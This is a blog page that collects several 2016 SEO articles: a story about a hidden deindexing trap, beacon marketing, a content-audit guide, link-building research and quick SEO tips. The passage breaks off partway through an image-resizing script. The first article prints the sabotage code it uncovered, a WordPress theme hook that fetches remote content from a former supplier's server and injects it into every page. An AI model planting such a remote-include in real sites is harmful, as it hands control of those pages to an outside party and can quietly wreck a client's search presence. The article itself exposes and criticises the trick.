Innovate not imitate!

Interested in the latest Growth hacks?

Welcome to our blog!

We want to help you start, manage, and grow your business using innovative strategies and implementation. We have a passion for helping businesses and companies of various sizes see the same success that we have achieved.

Our skillsets are wide and varied, spanning business strategy, marketing, and online strategy. An increasing number of companies are turning to the internet and online media as a means of maximising their marketing reach and exposure. This is a special area of focus for us, and we do more than simple SEO strategies.

See our website for more: www.innovatetoaccelerate.com

Thursday 30 June 2016

Unruly’s Outstream Video Ad Formats Debut on The Wall Street Journal

Advertisers on The Wall Street Journal’s website can now purchase Unruly’s outstream video ad formats, which create new premium video ad inventory within WSJ.com’s article pages. Unruly’s premium outstream video format begins to play only when the video is in-view, as defined by the Media Ratings Council (MRC). Measured by Moat, the format is designed […]

The post Unruly’s Outstream Video Ad Formats Debut on The Wall Street Journal appeared first on The SEM Post.



from The SEM Post http://ift.tt/2936dnf
http://ift.tt/eA8V8J via IFTTT

Why you may need to be aware of booby traps when hiring a new SEO

The online marketing world can be somewhat of a wild west in many regards, with SEO at the center of the chaos.

Among the thousands of providers across Australia, there is no shortage of promises, case studies and packages available for every business size. The central premise of SEO is that you will get long-term sustained traffic for your investment.

The industry as a whole must deal with a simple paradox: if providers do their job properly, they are theoretically no longer needed and stand to lose a customer. Meanwhile, if they do not do their job properly, they are guaranteed to lose a customer.

Within 24 hours of one of my SEO clients deciding they were happy enough with their rankings to pull out of their retainer, another of my clients finally finished their 12-month web design and SEO package with their initial provider.

As I was asking myself “how can I adapt my business to allow for sudden client satisfaction?”, that other client was in the process of having their site migrated to my server.

I arrived at my client’s office to begin a day’s work, and we checked the rankings for their site. The migration had been completed a few days prior and had gone through smoothly.

That abysmal feeling of dread set in as we saw that the site could no longer be found nestled in its top positions for any of its search terms.

The weird thing was that, as I checked for manual penalties or de-indexation by searching site:example.com, it became apparent that not every page had been dropped. Only the homepage, so far.

This at least narrowed the search down, and meant that I could check the source code for the homepage, and see if there was anything odd going on.

Sure enough, there it was:

<meta name="robots" content="noindex,follow" />

This line of code tells Google and other search engines to remove the website from their index, rendering it unfindable. It has its time and place in day-to-day web design and marketing, but clearly does not belong on the homepage of a website that is trying to gain traffic and potential customers.
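
If you ever need to check a handful of URLs for this quickly, a short script saves you from eyeballing source code by hand. The sketch below is a minimal example, assuming Python with the requests library installed; the URLs are placeholders for your own pages.

import re
import requests

# Placeholder URLs - swap in the pages you want to check
urls = [
    "https://www.example.com/",
    "https://www.example.com/services/",
]

for url in urls:
    response = requests.get(url, timeout=10)
    # Collect every meta tag, then flag any robots directive containing noindex
    meta_tags = re.findall(r"<meta[^>]+>", response.text, re.IGNORECASE)
    flagged = [m for m in meta_tags if "robots" in m.lower() and "noindex" in m.lower()]
    # noindex can also be served as an HTTP header, so check that too
    header = response.headers.get("X-Robots-Tag", "")
    if flagged or "noindex" in header.lower():
        print(f"WARNING: {url} is serving a noindex directive")
    else:
        print(f"OK: {url} looks indexable")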

I decided to fix the problem first and then later deal with the lingering question of ‘why has this code suddenly turned up?’

Once the hunt began for exactly where this code was being generated from, I became less and less convinced that this was some sort of accident.

Searching within any of the website files for ‘noindex’ turned up nothing, almost like the code wasn’t actually in there anywhere. Even downloading the entire set of website files and running them through a dedicated file searching tool, we couldn’t find a single instance of ‘noindex’ anywhere within the website.
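
If you don't have a dedicated file-searching tool to hand, the same hunt can be scripted over a downloaded copy of the site. A rough sketch, assuming Python and that the site files sit in a local folder (the path is a placeholder):

import os

SITE_DIR = "site-files"   # placeholder path to the downloaded website files
NEEDLE = "noindex"

for root, _dirs, files in os.walk(SITE_DIR):
    for name in files:
        path = os.path.join(root, name)
        try:
            with open(path, "r", encoding="utf-8", errors="ignore") as handle:
                for line_no, line in enumerate(handle, start=1):
                    if NEEDLE in line.lower():
                        print(f"{path}:{line_no}: {line.strip()}")
        except OSError:
            continue   # skip anything unreadable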

Sure enough though, the noindex code was in there somewhere, and not just on the front page, it would seem. Google had dropped the front page but had not yet gotten around to deindexing the rest of the pages, even though every page had the code.

The webhosting company that oversaw the migration assured me that they had simply taken the site files and placed them on a server, never touching any of the code. They joined the hunt.

We eventually discovered the source of the code; it was both ingenious and simple.

I received an email from the developer in charge of migrating the site:

“We have looked through the code and found the following lines in the theme's functions.php file…

add_action('wp_head', 'sidebar_config', 1, 3);
function sidebar_config()
{
    $output = file_get_contents('http://robots.clients.(*previous suppliers domain*).com.au/');
    echo $output;
}

Disabling only these has resulted in the nofollow,noindex disappearing.

Note that this specifically references connecting to and retrieving a file from robots.clients.(*previous suppliers domain*).com.au and then outputting the code into your site.”

As I spoke with the developer, he informed me that this code is only triggered if the site is no longer being hosted on the previous supplier's server.

The previous suppliers dismissed it as a mistake, initially trying to tell me that it must have happened during the migration, and later saying that they may have accidentally left the code in there. Who knows?

One thing is for sure: these guys, who have been in business much longer than I have, know their game well.

When a client drops me, I ask myself “what could I have done to keep them happier?” and “should I perhaps package my services better?”

When a client drops them, their entire site gets deindexed.

I think I prefer the soul-searching quest to provide value that people don't walk away from, rather than the vindictive attempt to tie a site's rankings to my server.



from SEO – Search Engine Watch http://ift.tt/29hVxEx
via IFTTT

How are beacons going to affect search marketing?

Recently I’ve been reading a lot about the effects beacons and proximity marketing may have on search strategy.

(I actually work for a company that makes beacons and management software, so it’s not just me being boring).

I’ve found little doubt that it will bring some very fundamental changes to the way we reach customers, and the type of targeting and data management we’ll need to master in order to do things properly.

Although perhaps not in the way you might think…

[Image: Edgelands at the Barbican]

Improving proximity results

Search Engine Watch has spoken about beacons a lot in the past, but just in case you need a refresher, a beacon is a tiny device that can transmit a signal to any Bluetooth device in range – phones, fitness bracelets, headphones, smartwatches etc.

Usually this happens through an app (although Google in particular are taking steps to remove this friction and enable direct device communication), and before the privacy police wade in, it’s all completely opt-in.

It certainly has some obvious ramifications for local search.


In the past, we’ve largely been limited to areas defined by map coordinates for localisation. These are fine for locating buildings, but not so hot once people actually enter a space.

Beacons have a big advantage here because they get that location down to an area a couple of metres across, and they allow you to transmit and receive data in realtime. If I’m standing by the apples in your supermarket, you can fire me a coupon.

I’m using that example on purpose by the way, and I’ll explain why in a moment.

Beacons don’t need to be interruptive

For marketers, there seems to be an assumption that beacons are an interruptive marketing tool.

Retail couponing is the most obvious use-case after all, but just as early ecommerce sites learned, couponing is no way to build a successful business. And as the publishing industry is learning, interruptive marketing… just isn’t very good really. People don’t like it in most cases.

As I say though, this is only an assumption. The real value of beacons is actually almost the complete opposite of interruptive.

It is in contextual interactions, which usually rely on either an active request from a user, or passive scanning and data aggregation by the person deploying the beacons.

In other words, if I visit a museum, download its app and enable push notifications while I'm there, then I'm actively searching for information about my location.

If not, then I can still be monitored as an anonymous device that is moving around the museum. Once this data is collected, there is a lot of potential value. Maybe it’s time to move that Rodin statue to a more prominent position (possibly next to the gift shop).

Search will need to become hyper-relevant in an open beacon marketplace

So what does this mean for search?

Currently, a lot of local search isn’t that great. There are plenty of fine examples, but there is certainly an adoption curve, particularly for small businesses.

Do a quick search for something like ‘Bike shop, Shrewsbury’ and you can usually see which businesses have a lot of low-hanging SEO fruit that they just aren’t optimising for.

This is a missed chance, but it is usually being missed because of a lack of familiarity and time. People who are busy running a hardware store don’t often have time or money to really concentrate on good SEO.

As beacon deployment becomes more widespread (and it is going to be), this situation is going to change for the user on the ground. App networks and beacons deployed as general infrastructure in more locations mean that local optimisation is opened up to more players, with more resources. Why should our local bike store be wasting time optimising when Raleigh can be doing it for them?

Local SEO will begin to be a wider concern not for the locations themselves, but for the companies that sell through those locations. And those companies have the resources and processes available to start doing a really good job.

There is, however, still a place for the location itself in all this, and that is in adding contextual value, which may not come from purely commercial campaigns.

Recently I visited Edgelands at the Barbican in London, where one of our clients has deployed beacons that guide visitors around the interesting (and slightly confusing) internal space.

The interesting thing here is that it occurs through sound, so that visitors are able to view their surroundings, rather than keeping their eyes glued to their phone screens. It adds context while keeping the visitor engaged with the physical space, rather than having the two vie for attention.

With the rise of experience stores, this is going to become a more important point of differentiation over the next few years. Customers won't want distracting alerts and pop-ups; they'll want something that provides a richer experience.

From the marketing side, providing these will become a way to deepen brand affinity as much as increase immediate sales.

Search is about to leave its silos behind

This makes location a strange, mixed bag for search. On one side, brands providing advertising through app networks and beacon fleets owned by third parties (in my opinion, telcos are currently best placed to handle and benefit from large scale deployment, as they already have large data networks and physical locations).

In many cases, this will be about hyper-localised PPC campaigns. On the other, locations providing realtime SEO, with a shifting set of keywords based on whatever is currently happening in-store (or in-museum, or in-restaurant for instance).

It means that we’ll have to get better at aligning our data and working out which signals really matter, and we’re going to need to get insanely good at management and targeting.

I hate to use this word, but search will need to become more holistic, and even more aligned with marketing. There’s a huge opportunity here for search marketers, customer experience, data management and more.



from SEO – Search Engine Watch http://ift.tt/2959asB
via IFTTT

Google Displaying Data from Tables in Regular Search Results

We have seen many cases where Google will show tables in featured snippets in the search results.  And some types of structured data have the appearance of tables when Google displays it in the search results, such as event listings.  But now Google is pulling information from tables to show in the search results. Here […]

The post Google Displaying Data from Tables in Regular Search Results appeared first on The SEM Post.



from The SEM Post http://ift.tt/29djFcj
http://ift.tt/eA8V8J via IFTTT

Google Testing Speed Test in Search Results; Bing’s Version Active

Google is testing a new internet speed test that displays right in the search results.  And Bing announced that they already include a speed test in their own search results. Dr. Pete Meyers of Mozcast fame spotted the Google test, although he wasn’t able to replicate it. Looks like Google is testing their own internet […]

The post Google Testing Speed Test in Search Results; Bing’s Version Active appeared first on The SEM Post.



from The SEM Post http://ift.tt/2986XK9
http://ift.tt/eA8V8J via IFTTT

The Functional Content Masterplan – Own the Knowledge Graph Goldrush with this On-Page Plan

Posted by SimonPenson

[Estimated read time: 17 minutes]

On-page content is certainly not one of the sexier topics in digital marketing.

Lost in the flashing lights of "cool digital marketing trends" and things to be seen talking about, it's become the poor relative of many a hyped "game-changer."

I’m here to argue that, in being distracted by the topics that may be more "cutting-edge," we're leaving our most valuable assets unloved and at the mercy of underperformance.

This post is designed not only to make it clear what good on-page content looks like, but also how you should go about prioritizing which pages to tackle first based on commercial opportunity, creating truly customer-focused on-page experiences.

What is "static" or "functional" content?

So how am I defining static/functional content, and why is it so important to nurture in 2016? The answer lies in the recent refocus on audience-centric marketing and Google’s development of the Knowledge Graph.

Whether you call your on-page content "functional," "static," or simply "on-page" content, they're all flavors of the same thing: content that sits on key landing pages. These may be category pages or other key conversion pages. The text is designed to help Google understand the relevance of the page and/or help customers with their buying decisions.

Functional content has other uses as well, but today we're focusing on its use as a customer-focused conversion enhancement and discovery tactic.

And while several years ago it would have been produced simply to aid a relatively immature Google to "find" and "understand," the focus is now squarely back on creating valuable user experiences for your targeted audience.

Google’s ability to better understand and measure what "quality content" really looks like — alongside an overall increase in web usage and ease-of-use expectation among audiences — has made key page investment critical to success on many levels.

We should now be looking to craft on-page content to improve conversion, search visibility, user experience, and relevance — and yes, even as a technique to steal Knowledge Graph real estate.

The question, however, is "how do I even begin to tackle that mountain?"

Auditing what you have

For those with large sites, the task of even beginning to understand where to start with your static content improvement program can be daunting. Even if you have a small site of a couple of hundred pages, the thought of writing content for all of them can be enough to put you off even starting.

As with any project, the key is gathering the data to inform your decision-making before simply "starting." That’s where my latest process can help.

Introducing COAT: The Content Optimization and Auditing Tool

To help the process along, we’ve been using a tool internally for months — for the first time today, there's now a version that anyone can use.

This link will take you to the new Content Optimisation and Auditing Tool (COAT), and below I’ll walk through exactly how we use it to understand the current site and prioritize areas for content improvement. I'll also walk you through the manual step-by-step process, should you wish to take the scenic route.

The manual process

If you enjoy taking the long road — maybe you feel an extra sense of achievement in doing so — then let's take a look at how to pull the data together to make data-informed decisions around your functional content.

As with any solid piece of analysis, we begin with an empty Excel doc and, in this case, a list of keywords you feel are relevant to and important for your business and site.

In this example, we'll take a couple of keywords and our own site:

Keywords:

Content Marketing Agency
Digital PR

Site:

http://ift.tt/10MOZUy

Running this process manually is labor-intensive (hence the need to automate it!) and to add dozens more keywords creates a lot of work for little extra knowledge gain, but by focusing on a couple you can see how to build the fuller picture.

Stage one

We start by adding our keywords to our spreadsheet alongside a capture of the search volume for those terms and the actual URL ranking, as shown below (NOTE: all data is for google.co.uk).

Next we add in ranking position...

We then look to the page itself and give each of the key on-page elements a score based on our understanding of best practice. If you want to be really smart, you can score the most important factors out of 20 and those lesser points out of 10.

In building our COAT tool to enable this to be carried out at scale across sites with thousands of pages, we made a list of many of the key on-page factors we know to affect rank and indeed conversion. They include:

  • URL optimization
  • Title tag optimization and clickability
  • Meta description optimization and clickability
  • H1, H2, and H3 optimization and clickability (as individual scores)
  • Occurrences of keyword phrases within body copy
  • Word count
  • Keyword density
  • Readability (as measured by the Flesch-Kincaid readability score)

This is far from an exhaustive list, but it's a great place to start your analysis. The example below shows an element of this scored:

Once you have calculated a score for every key factor, your job is then to turn this into an average, weighted score out of 100. In this case, you can see I've done this across the listed factors and have a final score for each keyword and URL:
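
If you're scripting the audit rather than working purely in Excel, the same calculation is only a few lines. A minimal sketch in Python; the element names, scores, and maximum points below are illustrative, not the exact weighting used by the COAT tool.

# Illustrative per-element scores for one keyword/URL pair
scores = {
    "title_tag":        {"score": 16, "max": 20},
    "h1":               {"score": 12, "max": 20},
    "meta_description": {"score": 7,  "max": 10},
    "body_copy":        {"score": 14, "max": 20},
    "readability":      {"score": 6,  "max": 10},
}

def weighted_score(elements):
    # Convert per-element scores into a single weighted score out of 100
    earned = sum(e["score"] for e in elements.values())
    possible = sum(e["max"] for e in elements.values())
    return round(100 * earned / possible, 1)

print(weighted_score(scores))   # 68.8 for the example values above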

Stage two

Once you have scores for a larger number of pages and keywords, it's then possible to begin organizing your data in a way that helps prioritise action.

You can do this simply enough by using filters and organising the table by any number of combinations.

You may want to sort by highest search volume and then by those pages ranking between, say, 5th and 10th position.

Doing this enables you to focus on the pages that may yield the most potential traffic increase from Google, if that is indeed your aim.

Working this way makes it much easier to deliver the largest positive net impact fastest.

Doing it at scale

Of course, if you have a large site with tens (or even hundreds) of thousands of pages, the manual option is almost impossible — which is why we scratched our heads and looked for a more effective option. The result was the creation of our Content Auditing and Optimisation Tool. Here's how you can make use of it to paint a fuller picture of your entire site.

Here's how it works

When it comes to using COAT, you follow a basic process:

  • Head over to the tool.
  • Enter your domain, or a sub-directory of the site if you'd like to focus on a particular section
  • Add the keywords you want to analyze in a comma-separated list
  • Click "Get Report," making sure you've chosen the right country

Next comes the smart bit: adding target keywords to the system before it crawls enables the algorithm to cross-reference all pages against those phrases and then score each combination against a list of critical attributes you'd expect the "perfect page" to have.

Let’s take an example:

You run a site that sells laptops. You enter a URL for a specific model, such as /apple-15in-macbook/, and a bunch of related keywords, such as "Apple 15-inch MacBook" and "Apple MacBook Pro."

The system works out the best page for those terms and measures the existing content against a large number of known ranking signals and measures, covering everything from title tags and H1s to readability tests such as the Flesch-Kincaid system.

This outputs a spreadsheet that scores each URL or even categories of URLs (to allow you to see how well-optimized the site is generally for a specific area of business, such as Apple laptops), enabling you to sort the data, discover the pages most in need of improvement, and identify where content gaps may exist.

In a nutshell, it'll provide:

  • What the most relevant target page for each keyword is
  • How well-optimized individual pages are for their target keywords
  • Where content gaps exist within the site’s functional content

It also presents the top-level data in an actionable way. An example of the report landing page can be seen below (raw CSV downloads are also available — more on that in a moment).

You can see the overall page score and simple ways to improve it. This is for our "Digital PR" keyword:

The output

As we've already covered in the manual process example, in addition to pulling the "content quality scores" for each URL, you can also take the data to the next level by adding in other data sources to the mix.

The standard CSV download includes data such as keyword, URL, and scores for the key elements (such as H1, meta, canonical use and static content quality).

This level of detail makes it possible to create a priority order for fixes based on lowest-scoring pages easily enough, but there are ways you can supercharge this process even more.

The first thing to do is run a simple rankings check using your favorite rank tracker for those keywords and add them into a new column in your CSV. It'll look a little like this (I've added some basic styling for clarity):

I also try to group keywords by adding a third column using a handful of grouped terms. In this example, you can see I'm grouping car model keywords with brand terms manually.

Below, you'll see how we can then group these terms together in an averaged cluster table to give us a better understanding of where the keyword volume might be from a car brand perspective. I've blurred the keyword grouping column here to protect existing client strategy data.

As you can see from the snapshot above, we now have a spreadsheet with keyword, keyword group, search volume, URL, rank, and the overall content score pulled in from the base Excel sheet we have worked through. From this, we can do some clever chart visualization to help us understand the data.
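
If you keep this working data in a CSV rather than Excel, the grouping and averaging can also be scripted. A minimal sketch, assuming Python with pandas installed; the rows simply mirror the spreadsheet columns described above and are purely illustrative.

import pandas as pd

# Illustrative rows mirroring the spreadsheet columns described above
df = pd.DataFrame([
    {"keyword": "subaru forester review", "keyword_group": "Subaru", "search_volume": 1900, "rank": 31, "content_score": 52},
    {"keyword": "subaru outback price", "keyword_group": "Subaru", "search_volume": 1300, "rank": 37, "content_score": 46},
    {"keyword": "ford focus review", "keyword_group": "Ford", "search_volume": 2400, "rank": 44, "content_score": 38},
])

# Total volume plus average rank and content score for each keyword group
clusters = df.groupby("keyword_group").agg(
    total_volume=("search_volume", "sum"),
    avg_rank=("rank", "mean"),
    avg_score=("content_score", "mean"),
).sort_values("avg_score")

print(clusters)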

Visualizing the numbers

To really understand where the opportunity lies and to take this process past a simple I’ll-work-on-the-worst-pages-first approach, we need to bring it to life.

This means turning our table into a chart. We'll utilize the chart functionality within Excel itself.

Here's an example of the corresponding chart for the table shown above, showing performance by category and ranking correlation. We're using dummy data here, but you can look at the overall optimization score for each car brand section alongside how well they rank (the purple line is average rank for that category):

If we focus on the chart above, we can begin to see a pattern between those categories that are better optimized and generally have better rankings. Correlation does not always equal causation, as we know, but it's useful information.

Take the very first column, or the Subaru category. We can see that it's one of the better-optimized categories (at 49%) and average rank is at 34.1. Now, these are hardly record-breaking positions, but it does point towards the value of well-worked static pages.

Making the categories as granular as possible can be very valuable here, as you can quickly build up a focused picture of where to put your effort to move the needle quickly. The process for doing so is an entirely subjective one, often based on your knowledge of your industry or your site information architecture.

Add keyword volume data into the mix and you know exactly where to build your static content creation to-do list.

Adding in context

Like any data set, however, it requires a level of benchmarking and context to give you the fullest picture possible before you commit time and effort to the content improvement process.

It’s for this reason that I always look to run the same process on key competitors, too. An example of the resulting comparison charts can be seen below.

The process is relatively straightforward: take an average of all the individual URL content scores, which will give you a "whole domain" score. Add competitors by repeating the process for their domain.

You can take a more granular view manually by following the same process for the grouped keywords and tabulating the result. Below, we can see how our domain sizes up against those same two competitors for all nine of our example keyword groups, such as the car brands example we looked at earlier.

With that benchmark data in place, you can move on to the proactive improvement part of the process.

The perfect page structure

Having identified your priority pages, the next step is to ensure you edit (or create them) in the right way to maximize impact.

Whereas a few years ago it was all about creating a few paragraphs almost solely for the sake of helping Google understand the page, now we MUST be focused on usability and improving the experience for the right visitor.

This means adding value to the page. To do that, you need to stand back and really focus in on the visitor: how they get to the page and what they expect from it.

This will almost always involve what I call "making the visitor smarter": creating content that ensures they make better and more informed buying decisions.

To do that requires a structured approach to delivering key information succinctly and in a way that enhances — rather than hinders — the user journey.

The best way of working through what that should look like is to share a few examples of those doing it well:

1. Tredz Top 5 Reviews

Tredz is a UK cycling ecommerce business. They do a great job of understanding what their audience is looking for and ensuring they're set up to make them smarter. The "Top 5" pages are certainly not classic landing pages, but they're brilliant examples of how you can sell and add value at the same time.

Below is the page for the "Top 5 hybrids for under £500." You can clearly see how the URL (http://ift.tt/29eH2DW), meta, H tags, and body copy all support this focus and are consistently aligned:

2. Read it for me

This is a really cool business concept and they also do great landing pages. You get three clear reasons to try them out — presented clearly and utilizing several different content types — all in one package.

3. On Stride Financial

Finance may not be where you'd expect to see amazing landing pages, but this is a great example. Not only is it an easy-to-use experience, it answers all the user's key questions succinctly, starting with "What is an installment loan?" It's also structured in a way to capture Knowledge Graph opportunity — something we'll come to shortly.

Outside of examples like these and supporting content, you should be aiming to create impactful headlines, testimonials (where appropriate), directional cues (so it's clear where to "go next"), and high-quality images to reflect the quality of your product or services.

Claiming Knowledge Graph

There is, of course, one final reason to work hard on your static pages. That reason? To claim a massively important piece of digital real estate: Google Featured Snippets.

Snippets form part of the wider Knowledge Graph, the tangible visualization of Google’s semantic search knowledge base that's designed to better understand the associations and entities behind words, phrases, and descriptions of things.

The Knowledge Graph comes in a multitude of formats, but one of the most valuable (and attainable from a commercial perspective) is the Featured Snippet, which sits at the top of the organic SERP. An example can be seen below from a search for "How do I register to vote" in google.co.uk:

In recent months, Zazzle Media has done a lot of work on landing page design to capture featured snippets with some interesting findings, most notably the level of extra traffic such a position can achieve.

Having now measured dozens of these snippets, we see an average of 15–20% extra traffic from them versus a traditional position 1. That’s a definite bonus, and makes the task of claiming them extremely worthwhile.

You don’t have to be first

The best news? You don’t even have to be in first position to be considered for a snippet. Our own research shows us that almost 75% of the examples we track have been claimed by pages ranked between 2nd and 10th position. It's far from being robust enough yet for us to formalize a full report on it, but early indications across more than 900 claimed snippets (heavily weighted to the finance sector at present) support these findings.

Similar research by search data specialists STAT has also supported this theory, revealing that objective words are more likely to appear. General question and definition words (like "does," "cause," and "definition") as well as financial words (like "salary," "average," and "cost") are likely to trigger a featured snippet. Conversely, the word "best" triggered zero featured snippets in over 20,000 instances.

This suggests that writing in a factual way is more likely to help you claim featured results.

Measuring what you already have

Before you run into this two-footed, you must first audit what you may (or may not) already have. If you run a larger site, you may already have claimed a few snippets by chance, and with any major project it's important to benchmark before you begin.

Luckily, there are a handful of tools out there to help you discover what you already rank for. My favorite is SEMrush.

The paid-for tool makes it easy to find out if you rank for any featured snippets already. I'd suggest using it to benchmark and then measure the effect of any optimization and content reworking you do as a result of the auditing process.

Claiming Featured Snippets

Claiming your own Featured Snippet then requires a focus on content structure and on answering key questions in a logical order. This also means paying close attention to on-page HTML structure to ensure that Google can easily and cleanly pick out specific answers.

Let’s look at a few examples showing that Google can pick up different types of content for different types of questions.

1. The list

One of the most prevalent examples of Featured Snippets is the list.

As you can see, Media Temple has claimed this incredibly visual piece of real estate simply by creating an article with a well-structured, step-by-step guide to answer the question:

"How do I set up an email account on my iPhone?"

If we look at how the page is formatted, we can see that the URL matches the search almost exactly, while the H1 tag serves to reinforce the relevance still further.

As we scroll down we find a user-friendly approach to the content, with short sentences and paragraphs broken up succinctly into sections.

This allows Google to quickly understand relevance and extract the most useful information to present in search; in this case, the step-by-step how-to process to complete the task.

Here are the first few paragraphs of the article, highlighting key structural elements. Below this is the list itself that's captured in the above Featured Snippet:

2. The table

Google LOVES to present tables; clearly there's something about the logical nature of how the data is presented that resonates with its team of left-brained engineers!

In the example below, we see a site listing countries by size. Historically, this page may well not have ranked so highly (it isn’t usually the page in position one that claims the snippet result). Because of the way it has structured the information so well, however, Geohive will be enjoying a sizable spike in traffic to the page.

The page itself looks like this — clear, concise and well-structured:

3. The definition

The final example is the description, or definition snippet; it's possibly the hardest to claim consistently.

It's difficult for two key reasons:

  • There will be lots of competition for the space, with many pages answering the search query in prose format.
  • It requires a focus on HTML structure and brilliantly crafted content to win.

In the example below, we can see a very good example of how you should be structuring content pages.

We start with a perfect URL (/what-is-a-mortgage-broker/) and this follows through to the H1 (What is a Mortgage Broker). The author then cleverly uses subheadings to extend the rest of the post into a thorough piece on the subject area. Subheadings include the key How, What, Where, and When areas of focus that any good journalism tutor will lecture you on using in any article or story. Examples might include:
  • So how does this whole mortgage broker thing work?
  • Mortgage brokers can shop the rate for you
  • Mortgage brokers are your loan guide
  • Mortgage broker FAQ

The result is a piece that leaves no stone unturned. Because of this, it's been shared plenty of times — a surefire signal that the article is positively viewed by readers.

Featured Snippet Cheatsheet

Not being one to leave you alone to figure this out though, I have created this simple Featured Snippet Cheatsheet, designed to take the guesswork out of creating pages worthy of being selected for the Knowledge Graph.

Do it today!

Thanks for making it this far. My one hope is for you to go off and put this plan into action for your own site. Doing so will quickly transform your approach to both landing pages and to your ongoing content creation plan (but that’s a post for another day!).

And if you do have a go, remember to use the free COAT tool and guides associated with this article to make the process as simple as possible.

Content Optimization and Auditing Tool: Click to access


Sign up for The Moz Top 10, a semimonthly mailer updating you on the top ten hottest pieces of SEO news, tips, and rad links uncovered by the Moz team. Think of it as your exclusive digest of stuff you don't have time to hunt down but want to read!



from The Moz Blog http://ift.tt/296XfeL
via IFTTT

Wednesday 29 June 2016

Which kinds of links are most valuable for high rankings?

What does link-building look like right now? What tactics work? Is it all about quality content or do more shady tactics still get results? 

Glen Allsop of ViperChill posted another excellent article recently, distilling the findings from his own manual analysis of 1,000 search results.

He looks at the link structure of various sites, trying to ascertain the kinds of links that help some sites rank, the tactics (white hat and not-so white hat) used by sites to rank, and the effects of factors like number of links and word count.

It’s a monster of a post – more than 5,000 words I’d guess – but truly worth a read. All I’ll do here is list some of the key lessons from Glen’s analysis.

The most common backlinks are natural

Glen found that natural (i.e. earned) backlinks top the chart, which is as it should be.

[Chart: most prominent backlink types (ViperChill)]

However, the study also found that many high ranking websites have some very low quality backlinks. They are things like forum pages, blog comments, and non-English Blogspot blogs. They’re not earned, but can be easily created.

Indeed, a recent look at Skyscanner’s impressive search rankings revealed something similar. There are quality links there, but plenty which could be classed as ‘low-quality’. Perhaps these are the result of older link building efforts, who knows?

Link volume does not influence ranking

It’s about quality not quantity. As this chart shows, the volume of backlinks does not correlate with ranking.

[Chart: number of backlinks vs. ranking position]

Variety of linking domains helps

Obvious perhaps, but good to reinforce. A variety of links from different domains matters much more than volume.

[Chart: referring domains vs. ranking position]

Longer content and high rankings

There have been a few studies suggesting a correlation between longer form content and higher search rankings.

It makes sense, as in theory, longer content can be more likely to satisfy the user (it’s detailed, covers key questions etc), and in turn more likely to attract links.

Glen’s data backs this point up. The average word count on all results was 1,762, and higher counts tended to correlate with higher rankings.


Link building tactics that still work

A few weeks ago, we talked about another finding around sitewide footer links used by some sites, and how tactics like this help the ‘rich get richer’ in search (this was another finding from ViperChill).

In this article, Glen looks at how Houzz uses a widget to embed dozens of hard-coded links in the websites of those who host it. It seems this tactic is still in use.

Good content still works

Writing quality content to attract links is still an excellent tactic. Evergreen content is key to this.

The example used here is a beginner's guide to the Paleo diet, from the nerdfitness blog. It has attracted links from 800 domains and continues to deliver traffic to this day.


Why does it still attract links? Four reasons:

  • High ranking. It’s up there right now, so when people look for resources to link to, there it is.
  • It’s a good article. It’s there because it serves a need. It’s also comprehensive which means people don’t need to look elsewhere.
  • Internal links. The sidebar on the homepage links to the post so it continues to accrue traffic.
  • Loyal audience. The site has an engaged audience who appreciate and link to the content.

Dodgy tactics can still work

There are still plenty of dubious tactics that are helping websites achieve high rankings.

For example, this .info site has 195,000 links from 242 domains; that's more than 800 per domain. I'm 'sure' they're all earned, natural links though…


The study found fewer private blog networks than expected, but also found that they still work.

In summary

I’ve only scratched the surface of the study here, so please check out the full article for much more. It is itself a great example of creating quality (and long-form) content that attracts links. I’m sure we won’t be the only site linking to it.



from SEO – Search Engine Watch http://ift.tt/29oMbFL
via IFTTT

Nine SEO techniques that take less than 15 minutes

I know. It’s the 21st century equivalent of ‘8 minute abs’. But bear with me on this…

Search engine optimisation should be an ongoing process, mixing technical on-page techniques with quality content, good old fashioned marketing, plenty of research, tonnes of planning, masses of testing and all the while taking into account searcher intent, context, algorithm changes… I get breathless just thinking about all the work that needs doing…

Basically, SEO is a job that is never done.

But, if you are struggling with time and resources, there are SEO techniques that don’t have to consume your entire day.

The following can be done while sat down in the morning, enjoying a pastry, listening to some cool light-jazz and blissfully remembering that this is a much better use of your time than that other ‘resolution’ you toyed with doing four paragraphs ago.

Please note: we published a similarly titled guide to quick SEO tips, written by Josh McCoy, way back in 2012. This is an updated, rewritten version that reflects the subsequent changes and updates to the search landscape.

1. Check your site’s organic CTR, then revise the title tags and meta descriptions of 10 of the lowest-performing pages

Head into your site’s Google Search Console, then click on Search Traffic>Search Analytics.

[Screenshot: Search Console Search Analytics]

Then click on the Impressions and CTR filters for Pages.

Here you can take a look at the pages with high visibility, but low CTR. Perhaps all they need is an improved meta description or title tag?

For a more detailed overview, check out How to improve CTR using Search Console.

2. Add Schema markup to your 10 most popular pages

You can add rich media to your search results by adding Schema markup to the HTML of your pages.

[Screenshot: rich snippet for a Captain America: Civil War review]

If you have a particularly massive site with years and years' worth of posts, the idea of adding rich snippets to your pages can seem terrifying. Instead, make a spreadsheet of your most popular posts, then every day go through 10 of them and implement Schema markup. This should help gradually improve the CTR of your results.
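
For most page types, a JSON-LD block is the quickest way to add the markup. The sketch below is a hypothetical example that builds a Review snippet with Python's json module and prints the script tag you would paste into the page's HTML; the film, author, and rating values are placeholders.

import json

# Placeholder review data - substitute values from your own page
review_markup = {
    "@context": "https://schema.org",
    "@type": "Review",
    "itemReviewed": {"@type": "Movie", "name": "Example Film"},
    "author": {"@type": "Person", "name": "Jane Editor"},
    "reviewRating": {"@type": "Rating", "ratingValue": "4", "bestRating": "5"},
}

snippet = (
    '<script type="application/ld+json">\n'
    + json.dumps(review_markup, indent=2)
    + "\n</script>"
)
print(snippet)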

3. Improve your site speed by optimising images

Site speed is a hugely important ranking signal, and you can check your site’s loading time on both mobile and desktop with this new site speed tool.

Obviously improving the performance of your site is a complicated job best saved for the tech team, but you can help…

Images are by far the 'heaviest' element when it comes to page load. So why not spend a few minutes working back through your most popular posts and making your image file sizes smaller?

For example, if there’s an image on your page that’s 1024 x 683 pixels, but the user only sees it at a maximum of 420 x 289, you could ease the strain on your page by compressing the file size with very little noticeable difference.

Read this article for full details: How to optimise your page images to increase site speed.
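
If you'd rather batch-process a folder of images yourself than do it one by one in your CMS, something like the sketch below works. It assumes Python with the Pillow library; the folder names and target size are placeholders, and only JPEGs are handled to keep it simple.

import os
from PIL import Image

IMAGE_DIR = "images-to-optimise"    # placeholder folder of oversized images
OUTPUT_DIR = "images-optimised"     # resized copies are written here
MAX_SIZE = (420, 289)               # the largest size the page actually displays

os.makedirs(OUTPUT_DIR, exist_ok=True)

for name in os.listdir(IMAGE_DIR):
    if not name.lower().endswith((".jpg", ".jpeg")):
        continue
    img = Image.open(os.path.join(IMAGE_DIR, name))
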